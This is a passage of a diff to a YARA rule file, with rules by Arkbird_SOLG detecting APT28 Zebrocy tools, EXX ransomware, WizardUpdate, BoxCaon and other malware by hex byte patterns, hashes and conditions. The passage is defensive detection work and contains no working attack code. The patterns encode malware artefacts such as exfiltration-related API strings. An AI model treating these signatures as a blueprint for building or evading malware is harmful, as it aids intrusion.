85 c0 ee ff ff 51 0f 43 85 c0 ee ff ff 8d 8d 90 ee ff ff 50 6a 30 68 a0 56 45 00 8d 85 c0 ee ff ff 50 ff b5 e8 ee ff ff e8 83 45 00 00 83 bd a4 ee ff ff 10 8d 85 90 ee ff ff 6a 00 0f 43 85 90 ee ff ff 6a 00 50 68 d4 56 45 00 68 d8 56 45 00 6a 00 ff d7 8b 95 a4 ee ff ff 83 fa 10 72 2f 8b 8d 90 ee ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc } + $s3 = { 68 00 00 00 f0 6a 01 6a 00 6a 00 8d 85 5c ee ff ff 50 ff 15 14 70 44 00 8d 85 40 ee ff ff 50 57 6a 01 ff b5 5c ee ff ff ff 15 40 70 44 00 8b 35 1c 70 44 00 8d 85 60 ec ff ff 6a 20 50 6a 00 6a 00 6a 01 6a 00 ff b5 40 ee ff ff c7 85 e8 ee ff ff 20 00 00 00 c7 85 60 ec ff ff 20 00 00 00 ff d6 ff b5 60 ec ff ff e8 1f cc 01 00 8b 8d 50 ec ff ff 83 c4 04 89 85 4c ec ff ff 0f 10 01 0f 11 00 0f 10 41 10 8d 8d e8 ee ff ff 0f 11 40 10 ff b5 60 ec ff ff 51 50 6a 00 6a 01 6a 00 ff b5 40 ee ff ff ff d6 8d 85 6c ec ff ff 33 ff 50 57 6a 01 68 80 00 00 00 ff b5 4c ec ff ff 89 bd 40 ec ff ff 89 bd bc ee ff ff ff 15 3c 70 44 00 85 c0 74 47 ff b5 6c ec ff ff e8 ae cb 01 00 83 c4 04 8b f0 8d 85 6c ec ff ff 89 b5 bc ee ff ff 50 56 6a 01 68 80 00 00 00 ff b5 4c ec ff ff ff 15 3c 70 44 00 85 } + $s4 = { 8b ec 6a ff 68 2b 52 44 00 64 a1 00 00 00 00 50 81 ec 8c 02 00 00 a1 c0 c8 45 00 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 6a 05 33 c0 c7 45 c0 00 00 00 00 68 84 57 45 00 8d 4d c0 c7 45 d0 00 00 00 00 c7 45 d4 07 00 00 00 66 89 45 c0 e8 59 3f 00 00 c7 45 fc 00 00 00 00 8d 4d d8 6a 03 33 c0 c7 45 d8 00 00 00 00 68 90 57 45 00 c7 45 e8 00 00 00 00 c7 45 ec 07 00 00 00 66 89 45 d8 e8 28 3f 00 00 6a 00 6a 0f c7 45 fc 01 00 00 00 ff 15 98 70 44 00 8b f0 89 b5 74 fd ff ff 83 fe ff 0f 84 2c 02 00 00 a1 9c 70 44 00 8d 7d c0 8b 0d 48 70 44 00 89 85 7c fd ff ff a1 80 70 44 00 89 85 78 fd ff ff a1 4c 70 44 00 89 85 80 fd ff ff a1 90 70 44 00 c7 85 88 fd ff ff 00 00 00 00 89 bd 84 fd ff ff 89 8d 6c fd ff ff 89 85 70 fd ff ff 66 66 66 } condition: - filesize >2KB and 6 of ($s*) + uint16(0)==0x5A4D and filesize >100KB and all of ($s*) } -rule ARKBIRD_SOLG_MAL_OSX_Wizardupdate_Oct_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_APT28_VHD_Nov_2020_1 : FILE { meta: - description = "Detect WizardUpdate installer on OSX system" + description = "Detect suspicious VHD file with APT28 artefacts inside (November 2020)" author = "Arkbird_SOLG" - id = "50974725-6b45-5f2f-aa76-ae73dc752873" - date = "2021-10-22" - modified = "2021-10-23" - reference = "https://twitter.com/MsftSecIntel/status/1451279679059488773" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-23/WizardUpdate/MAL_OSX_WizardUpdate_Oct_2021_1.yara#L1-L21" + id = "25452eaa-f135-5b7f-a523-67715a2ab9f7" + date = "2020-12-09" + modified = "2020-12-10" + reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L3-L35" license_url = "N/A" - logic_hash = "b25145a9aa33c9518e5e0847b50faa8b67d65078ddfbb66de49196a17ddd3137" - score = 75 - quality = 75 + logic_hash = "d72c3428cf731feb63c59ef109b99ec234e69bb6df34bdde928cc4b886f0533b" + score = 50 + quality = 69 tags = "FILE" - hash1 = "939cebc99a50989ffbdbb2a6727b914fc9b2382589b4075a9fd3857e99a8c92a3" - hash2 = "c5017798275f054ae96c69f5dd0b378924c6504a70c399279bbf7f33d990d45b" - hash3 = "7067e6a69a8f5fdbabfb00d03320cfc2f3584a83304cbeeca7e8edc3d57bbbd4" - tlp = "White" - adversary = "-" + level = "experimental" + hash1 = "707b752f6bd89d4f97d08602d0546a56d27acfe00e6d5df2a2cb67c5e2eeee30" strings: - $s1 = { 48 89 e5 48 83 ec 70 48 89 7d f0 48 c7 45 e0 00 00 00 00 b8 01 00 00 00 48 89 c7 48 89 c6 e8 b8 3b 00 00 31 c9 89 cf 48 89 45 d8 48 c7 45 d0 00 00 00 00 e8 a9 3b 00 00 48 8b 7d f0 48 8d 35 d4 3f 00 00 89 45 cc e8 ba 3b 00 00 48 89 45 e8 48 83 7d e8 00 0f 85 0d 00 00 00 48 c7 45 f8 00 00 00 00 e9 cd 00 00 00 e9 00 00 00 00 48 8b 55 e8 48 8d 7d e0 48 8d 75 d0 e8 70 3b 00 00 48 83 f8 ff 0f 84 9c 00 00 00 48 8b 7d d8 48 8b 45 d8 48 89 7d c0 48 89 c7 e8 76 3b 00 00 48 8b 7d e0 48 89 45 b8 e8 69 3b 00 00 48 8b 4d b8 48 01 c1 48 81 c1 01 00 00 00 48 8b 7d c0 48 89 ce e8 49 3b 00 00 48 89 45 d8 48 8b 45 d8 48 8b 7d d8 48 89 45 b0 e8 3a 3b 00 00 48 8b 4d b0 48 01 c1 48 8b 75 e0 48 8b 7d e0 48 89 4d a8 48 89 75 a0 e8 1e 3b 00 00 48 05 01 00 00 00 48 8b 7d a8 48 8b 75 a0 48 89 c2 e8 0e 3b 00 00 48 8b 7d e0 48 89 45 98 e8 d1 3a 00 00 48 c7 45 } - $s2 = { 48 89 e5 48 81 ec 80 01 00 00 48 89 f8 48 8b 0d 7b 31 00 00 48 8b 09 48 89 4d f8 48 89 bd e8 fe ff ff c6 85 e7 fe ff ff 00 48 89 bd b8 fe ff ff 48 89 b5 b0 fe ff ff 48 89 85 a8 fe ff ff e8 9c 01 00 00 c7 85 d4 fe ff ff 00 01 00 00 48 8d 35 0a 2e 00 00 48 8b bd b0 fe ff ff e8 df 28 00 00 e9 00 00 00 00 48 8b bd b0 fe ff ff e8 8e 01 00 00 48 8d 35 ec 2d 00 00 48 89 c7 e8 5b 29 00 00 48 89 85 a0 fe ff ff e9 00 00 00 00 48 8b 85 a0 fe ff ff 48 89 85 d8 fe ff ff 48 83 bd d8 fe ff ff 00 0f 84 c4 00 00 00 e9 00 00 00 00 48 8b bd d8 fe ff ff e8 04 29 00 00 89 85 9c fe ff ff e9 00 00 00 00 8b 85 9c fe ff ff 83 f8 00 0f 95 c1 80 f1 ff f6 c1 01 0f 85 05 00 00 00 e9 75 00 00 00 48 8b 95 d8 fe ff ff 48 8d bd f0 fe ff ff be 00 01 00 00 e8 ca 28 00 00 48 89 85 90 fe ff ff e9 00 00 00 00 48 8b 85 90 fe ff ff 48 83 f8 00 0f 84 3b 00 00 00 48 8d b5 f0 fe ff ff 48 8b bd b8 fe ff ff } - $s3 = "11101000010110101110100011010010110110101100101011011110111010101110100001000000011100100110000001100000010000000101101010011000010000000100010011010000111010001110100011100000111001100111010001011110010111101101101" - $s4 = { 48 8b bd d8 fe ff ff e8 73 28 00 00 e9 00 00 00 00 e9 00 00 00 00 c6 85 e7 fe ff ff 01 f6 85 e7 fe ff ff 01 0f 85 0c 00 00 00 48 8b bd b8 fe ff ff e8 cb 27 00 00 48 8b 05 fc 2f 00 00 48 8b 00 48 8b 4d f8 48 39 c8 0f 85 32 00 00 00 48 8b 85 a8 fe ff ff 48 81 c4 80 01 00 } + $c1 = { 49 6e 76 61 6c 69 64 20 70 61 72 74 69 74 69 6f 6e 20 74 61 62 6c 65 00 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 4d 69 73 73 69 6e 67 20 6f 70 65 72 61 74 69 6e 67 20 73 79 73 74 65 6d 00 00 00 63 7b } + $c2 = { 52 90 4e 54 46 53 } + $c3 = { 41 20 64 69 73 6b 20 72 65 61 64 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 00 0d 0a 42 4f 4f 54 4d 47 52 20 69 73 20 63 6f 6d 70 72 65 73 73 65 64 00 0d 0a 50 72 65 73 73 20 43 74 72 6c 2b 41 6c 74 2b 44 65 6c 20 74 6f 20 72 65 73 74 61 72 74 } + $c4 = { 42 00 4f 00 4f 00 54 00 4d 00 47 00 52 00 04 00 24 00 49 00 33 00 30 } + $c5 = { 4e 00 54 00 4c 00 44 00 52 00 07 00 42 00 4f 00 4f 00 54 00 54 00 47 00 54 00 07 00 42 00 4f 00 4f 00 54 00 4e 00 58 00 54 } + $c6 = { 46 49 4c 45 30 00 03 00 8? ?d } + $c7 = { 24 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 60 00 00 00 40 } + $s1 = { 46 61 73 74 4d 4d 20 42 6f 72 6c 61 6e 64 20 45 64 69 74 69 6f 6e 20 a9 20 32 30 30 34 2c 20 32 30 30 35 20 50 69 65 72 72 65 20 6c 65 20 52 69 63 68 65 20 2f 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c 20 53 6f 66 74 77 61 72 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 } + $s2 = { 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 } + $s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c } + $s4 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 00 00 6c 61 79 6f 75 74 20 74 65 78 74 } + $s5 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 } + $s6 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 } + $s7 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 00 11 00 53 00 74 00 72 00 65 00 61 00 6d 00 20 00 72 00 65 00 61 00 64 00 20 00 65 00 72 00 72 00 6f 00 72 } + $s8 = { 25 73 2c 20 43 6c 61 73 73 49 44 3a 20 25 73 } + $s9 = { 43 6f 6e 6e 65 63 74 4b 69 6e 64 b0 10 40 00 44 00 00 ff 44 00 00 ff 01 00 00 00 00 00 00 80 00 00 00 80 04 00 11 52 65 6d 6f 74 65 4d 61 63 68 69 6e 65 4e 61 6d 65 } + $s10 = { 22 20 4e 54 2f 20 [1-4] 20 4f 4d 2f 20 45 54 55 4e 49 4d 20 43 53 2f 20 65 74 61 65 72 43 2f 20 73 6b 73 61 74 68 63 73 } + $s11 = { 2f 2f 3a 70 74 74 68 } condition: - uint32(0)==0xFEEDFACF and filesize >50KB and (($s1 and $s3) or ($s2 and $s4)) + uint16(0)==0x33c0 and filesize >40KB and 5 of ($c*) and 8 of ($s*) } -rule ARKBIRD_SOLG_MAL_Heinote_June_2020_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_APT28_Zebrocy_GO_Downloader_Nov_2020_1 : FILE { meta: - description = "Detect Hienote malware" + description = "Detect Zebrocy Go downloader (November 2020)" author = "Arkbird_SOLG" - id = "5c0e604a-83d4-5c6f-83fa-0df878da80d8" - date = "2020-06-26" - modified = "2023-11-22" - reference = "https://twitter.com/JAMESWT_MHT/status/1276471822217891840" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-26/Heinote_June_2020-1.yar#L1-L29" + id = "114c0297-7168-5d20-b56b-89b0b47f18c7" + date = "2020-12-09" + modified = "2020-12-10" + reference = "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/APT28/APT_APT28_Nov_2020_1.yar#L37-L65" license_url = "N/A" - logic_hash = "679f1113c9c770910d18da395b13aaef009ecdde91a0c11f931d0d7e63ed122a" - score = 75 + logic_hash = "e7b2e7c250f3a98127399176adf9f93b758f0a5111e126dd0a75a3fb95a48da9" + score = 50 quality = 61 tags = "FILE" - hash1 = "e0a34b9c420ddd930b3f89c13c3f564907dd948e88f668a0fe55ce506220bd73" + level = "experimental" + hash1 = "61c2e524dcc25a59d7f2fe7eff269865a3ed14d6b40e4fea33b3cd3f58c14f19" + hash2 = "f36a0ee7f4ec23765bb28fbfa734e402042278864e246a54b8c4db6f58275662" strings: - $s1 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 2d 2d 2d 2d } - $s2 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 2d 2d 2d 2d } - $s3 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 47 65 74 4d 61 69 6e 50 61 67 65 20 6c 70 73 7a 75 72 6c 20 3d 20 25 73 } - $s4 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 73 74 61 74 75 73 20 3d 20 25 64 2f 25 64 20 67 65 74 20 3d 20 25 73 20 73 65 74 20 3d 20 25 73 } - $s5 = { 44 65 62 75 67 49 6e 66 6f } - $s6 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 2d 2d 2d 2d } - $s7 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 66 61 76 20 72 65 74 20 3d 20 25 64 0a } - $s8 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 69 20 3d 20 25 64 20 6c 70 73 7a 4d 61 67 69 63 20 3d 20 25 73 0a } - $s9 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 53 45 54 43 4f 4f 4b 49 45 48 41 4f 31 32 33 5d 20 6f 6b 20 6f 6b 0a } - $s10 = { 75 73 65 72 6e 61 6d 65 3d 22 25 73 22 2c 20 72 65 61 6c 6d 3d 22 25 73 22 2c 20 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 75 72 69 3d 22 25 73 22 2c 20 63 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 6e 63 3d 25 30 38 78 2c 20 71 6f 70 3d 25 73 2c 20 72 65 73 70 6f 6e 73 65 3d 22 25 73 22 } - $s11 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword ascii - $s12 = { 25 73 20 63 6f 6f 6b 69 65 20 25 73 3d 22 25 73 22 20 66 6f 72 20 64 6f 6d 61 69 6e 20 25 73 2c 20 70 61 74 68 20 25 73 2c 20 65 78 70 69 72 65 20 25 49 36 34 64 0a } - $s13 = "User-Agent: %s" fullword ascii - $s14 = "Send failure: %s" fullword ascii - $s15 = "ftp://%s:%s@%s" fullword ascii - $s16 = "Host: %s%s%s" fullword ascii - $s17 = "Referer: %s" fullword ascii + $c1 = "os.(*ProcessState).sys" fullword ascii + $c2 = "os/exec.(*ExitError).Sys" fullword ascii + $c3 = "os/exec.ExitError.Sys" fullword ascii + $c4 = "os.(*ProcessState).Sys" fullword ascii + $p1 = "syscall.CreatePipe" fullword ascii + $p2 = "os.Pipe" fullword ascii + $p3 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 70 69 70 65 29 2e 63 6c 6f 73 65 44 6f 6e 65 4c 6f 63 6b 65 64 } + $p4 = { 6e 65 74 2f 68 74 74 70 2e 28 2a 68 74 74 70 32 63 6c 69 65 6e 74 53 74 72 65 61 6d 29 2e 67 65 74 53 74 61 72 74 65 64 57 72 69 74 65 } + $op1 = { 75 5f 67 3d 25 73 20 25 71 25 73 2a 25 64 25 73 3d 25 73 26 23 33 34 3b 26 23 33 39 3b 26 61 6d 70 3b } + $op2 = { 70 63 3d 25 21 28 4e 4f 56 45 52 42 29 25 21 57 65 65 6b 64 61 79 28 25 73 7c 25 73 25 73 7c 25 73 28 42 41 44 49 4e 44 45 58 29 } + $op3 = { 48 54 54 50 5f 50 52 4f 58 59 48 6f 73 74 3a 20 25 73 0d 0a 49 50 20 61 64 64 72 65 73 73 4b 65 65 70 2d 41 6c 69 76 65 } + $op4 = { 63 6f 6e 6e 65 63 74 69 6f 6e 20 65 72 72 6f 72 3a 20 25 73 63 6f 6e 6e 65 63 74 69 6f 6e 20 74 69 6d 65 64 20 6f 75 74 } + $op5 = { 2d 2d 2d 2d 2d 42 45 47 49 4e 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d } + $op6 = { 2d 2d 2d 2d 2d 45 4e 44 20 52 53 41 20 54 45 53 54 49 4e 47 20 4b 45 59 2d 2d 2d 2d 2d } condition: - uint16(0)==0x4D5A and filesize <450KB and 14 of them + uint16(0)==0x4d5a and filesize >800KB and (pe.imphash()=="91802a615b3a5c4bcc05bc5f66a5b219") and 3 of ($c*) and 3 of ($p*) and 3 of ($op*) } -rule ARKBIRD_SOLG_APT_APT28_Zekapab_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_Ran_ELF_EXX_Nov_2020_1 : FILE { meta: - description = "Detect Zekapab used by APT28 group" + description = "Detect EXX variant ELF ransomware" author = "Arkbird_SOLG" - id = "634f32dd-8bcf-5c58-a335-9b66ff568a54" - date = "2021-03-15" - modified = "2021-03-15" - reference = "https://twitter.com/DrunkBinary/status/1371423755608719360" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-15/APT28/APT_APT28_Zekapab_Mar_2021_1.yar#L1-L25" + id = "fe85d480-317a-51c3-a817-fc9034e2944f" + date = "2020-12-09" + modified = "2020-12-09" + reference = "Internal Research" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-09/EXX/Ran_ELF_EXX_Nov_2020_1.yar#L1-L28" license_url = "N/A" - logic_hash = "dabaab47c193a05620d282a00b6b47f710cfa6b1efc699ea5d47267d10cfdcb6" - score = 60 - quality = 23 + logic_hash = "4508a0cf79d0d85959009f59e1471cbf123fa24f5c21da5801e91ed0bbe8a085" + score = 50 + quality = 73 tags = "FILE" - hash1 = "eae62bb4110bcd00e9d1bcaba9000defcda3d1ab832fa2634d928559d066cb15" + level = "experimental" + hash1 = "cb408d45762a628872fa782109e8fcfc3a5bf456074b007de21e9331bb3c5849" strings: - $s1 = { 68 74 74 70 3A 2F 2F } - $s2 = { 68 74 74 70 73 3A 2F 2F } - $s3 = { 32 44 34 46 37 30 36 35 36 45 32 30 37 30 37 32 36 46 36 33 36 35 37 33 37 33 32 44 } - $s4 = { 35 30 34 33 32 30 34 45 36 31 36 44 36 35 33 41 32 30 } - $s5 = { 34 42 34 32 37 32 36 34 32 30 34 43 36 31 36 45 36 37 33 41 32 30 } - $s6 = { 53 79 73 74 65 6d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4b 65 79 62 6f 61 72 64 20 4c 61 79 6f 75 74 73 5c 25 2e 38 78 } - $header1 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 } - $header2 = { 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 } - $dbg1 = { 46 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 6e 00 6f 00 74 00 20 00 66 00 6f 00 75 00 6e 00 64 00 0d 00 4e 00 6f 00 74 00 20 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 } - $dbg2 = { 53 00 79 00 73 00 74 00 65 00 6d 00 20 00 45 00 72 00 72 00 6f 00 72 00 2e 00 20 00 20 00 43 00 6f 00 64 00 65 00 3a 00 20 00 25 00 64 00 2e 00 0d 00 0a 00 25 00 73 } - $dbg3 = { 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 25 00 73 00 2e 00 0a 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 65 00 64 00 2e } - $dbg4 = { 45 00 72 00 72 00 6f 00 72 00 20 00 72 00 65 00 61 00 64 00 69 00 6e 00 67 00 20 00 25 00 73 00 25 00 73 00 25 00 73 00 3a 00 20 00 25 00 73 } - $dbg5 = { 52 00 65 00 73 00 6f 00 6c 00 76 00 69 00 6e 00 67 00 20 00 68 00 6f 00 73 00 74 00 6e 00 61 00 6d 00 65 00 20 00 25 00 73 00 2e } - $dbg6 = { 53 00 6f 00 63 00 6b 00 65 00 74 00 20 00 45 00 72 00 72 00 6f 00 72 00 20 00 23 00 20 00 25 00 64 00 0d 00 0a 00 25 00 73 } + $dbg1 = { 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2c 20 72 65 74 75 72 6e 20 63 6f 64 65 20 3d 20 25 30 38 58 0a } + $dbg2 = { 47 72 65 65 74 69 6e 67 73 20 [3-10] 21 } + $dbg3 = { 63 79 63 6c 65 73 3d 25 6c 75 20 72 61 74 69 6f 3d 25 6c 75 20 6d 69 6c 6c 69 73 65 63 73 3d 25 6c 75 20 73 65 63 73 3d 25 6c 75 20 68 61 72 64 66 61 69 6c 3d 25 64 20 61 3d 25 6c 75 20 62 3d 25 6c 75 0a } + $dbg4 = { 53 48 41 2d 25 64 20 74 65 73 74 20 23 25 64 3a } + $lib1 = "pthread_mutex_unlock@@GLIBC_2.2.5" fullword ascii + $lib2 = "pthread_mutex_lock@@GLIBC_2.2.5" fullword ascii + $lib3 = "mbedtls_rsa_import" fullword ascii + $lib4 = "mbedtls_rsa_export" fullword ascii + $lib5 = "mbedtls_oid_get_extended_key_usage" fullword ascii + $lib6 = "mbedtls_sha256_process" fullword ascii + $seq1 = { 48 83 ec 20 89 7d ec 48 89 75 e0 b8 00 00 00 00 e8 77 00 00 00 48 8d 45 f0 b9 00 00 00 00 48 8d 15 b5 ff ff ff be 00 00 00 00 48 89 c7 e8 d6 fb ff ff c7 45 fc 01 00 00 00 eb } + $seq2 = { 00 00 00 00 e8 b2 fe ff ff 48 8b 45 e8 48 89 c7 e8 92 ed ff ff 48 83 c0 01 48 89 c7 e8 c6 ee ff ff 48 89 45 f8 48 83 7d f8 00 74 3a 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 f8 ec ff ff 48 8b 45 f8 48 89 c7 e8 12 fd ff ff 48 8b 45 f8 48 89 c7 e8 90 ec ff ff b8 00 00 00 00 e8 95 fc ff ff } + $seq3 = { e5 41 55 41 54 53 48 81 ec 18 18 00 00 c7 45 dc 00 00 00 00 48 c7 45 d0 00 00 00 00 bf 00 00 00 00 e8 13 fd ff ff 89 c7 e8 7c fc ff ff e8 d7 fd ff ff 41 89 c5 e8 cf fd ff ff 41 89 c4 e8 c7 fd ff ff 89 c3 e8 c0 fd ff ff 89 c2 48 8d 85 d0 e7 ff ff 4d 89 e9 4d 89 e0 48 89 d9 48 8d 35 bf 0a 02 00 48 89 } condition: - uint16(0)==0x5a4d and filesize >100KB and 1 of ($header*) and 3 of ($s*) and 4 of ($dbg*) + uint16(0)==0x457f and filesize >80KB and 3 of ($dbg*) and 4 of ($lib*) and 2 of ($seq*) } -rule ARKBIRD_SOLG_Mal_Boxcaon_Jul_2021_1 : FILE +import "pe" + +rule ARKBIRD_SOLG_APT_Patchwork_Tool_CVE_2019_0808_1 : FILE { meta: - description = "Detect the BoxCaon malware" + description = "Detect CVE 2019-0808 tool used by Patchwork group" author = "Arkbird_SOLG" - id = "5f456b73-02f9-5dd7-973e-bde20dcddd27" - date = "2021-07-01" - modified = "2021-07-02" - reference = "https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-02/IndigoZebra/Mal_BoxCaon_Jul_2021_1.yara#L1-L22" + id = "169255fe-dd7a-5a4e-8f0f-d84a0cf5c684" + date = "2020-08-27" + modified = "2021-07-13" + reference = "https://blog.exodusintel.com/2019/05/17/windows-within-windows/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-27/APT_Patchwork_Tool_CVE_2019_0808_1.yar#L3-L34" license_url = "N/A" - logic_hash = "c7dfce8d7a451817a80897d5cb02cec5aba52f86ece0286353865b7d391e2ffc" - score = 75 - quality = 46 + logic_hash = "e66df5d69d64c00cb68ff7bea0f7a7eec6657aff83d0f6cdb48d908bae8bcec8" + score = 50 + quality = 75 tags = "FILE" - hash1 = "8be3b10406f690ae5cf46c1dba18cb9a1c75bf646defcc9cab81d40fe0e0cc1b" - hash2 = "d0b88ab321a05fc94505620c9d02baec4cb1de7bb3b0067de4f8c0d3ba8548b2" - tlp = "White" - adversary = "IndigoZebra" + hash1 = "49f8a9203e5055777a67490923243405b9aa519016645fd75731c53cbf02073c" + level = "Experimental" strings: - $s1 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 61 75 74 6f 72 65 6e 61 6d 65 22 3a 20 66 61 6c 73 65 7d } - $s2 = { 7b 22 70 61 74 68 22 3a 20 22 25 73 22 2c 22 72 65 63 75 72 73 69 76 65 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 65 64 69 61 5f 69 6e 66 6f 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 64 65 6c 65 74 65 64 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 68 61 73 5f 65 78 70 6c 69 63 69 74 5f 73 68 61 72 65 64 5f 6d 65 6d 62 65 72 73 22 3a 20 66 61 6c 73 65 2c 22 69 6e 63 6c 75 64 65 5f 6d 6f 75 6e 74 65 64 5f 66 6f 6c 64 65 72 73 22 3a 20 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 5f 6e 6f 6e 5f 64 6f 77 6e 6c 6f 61 64 61 62 6c 65 5f 66 69 6c 65 73 22 3a 20 74 72 75 65 7d } - $s3 = "api.dropboxapi.com" fullword ascii - $s4 = { 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 3a 20 22 00 00 00 22 00 00 00 22 70 61 74 68 5f 64 69 73 70 6c 61 79 22 20 3a 20 22 00 00 0d 00 0a 00 44 00 72 00 6f 00 70 00 62 00 6f 00 78 00 2d 00 41 00 50 00 49 00 2d 00 41 00 72 00 67 00 3a 00 20 00 7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 20 00 22 00 00 00 22 00 7d 00 0d 00 0a 00 00 00 00 00 7b 22 65 72 72 6f 72 5f 73 75 6d 6d 61 72 79 22 00 00 00 00 25 00 73 00 5c 00 25 00 73 00 00 00 7b 22 70 61 74 68 22 3a 20 22 25 73 22 } - $s5 = "C:\\Users\\Public\\%d\\" fullword ascii - $s6 = { 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 20 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 2c 00 22 00 61 00 75 00 74 00 6f 00 72 00 65 00 6e 00 61 00 6d 00 65 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 2c 00 22 00 6d 00 75 00 74 00 65 00 22 00 3a 00 20 00 74 00 72 00 75 00 65 00 2c 00 22 00 73 00 74 00 72 00 69 00 63 00 74 00 5f 00 63 00 6f 00 6e 00 66 00 6c 00 69 00 63 00 74 00 22 00 3a 00 20 00 66 00 61 00 6c 00 73 00 65 00 7d 00 0d 00 0a 00 43 00 6f 00 6e 00 74 00 65 00 6e 00 74 00 2d 00 54 00 79 00 70 00 65 00 3a 00 20 00 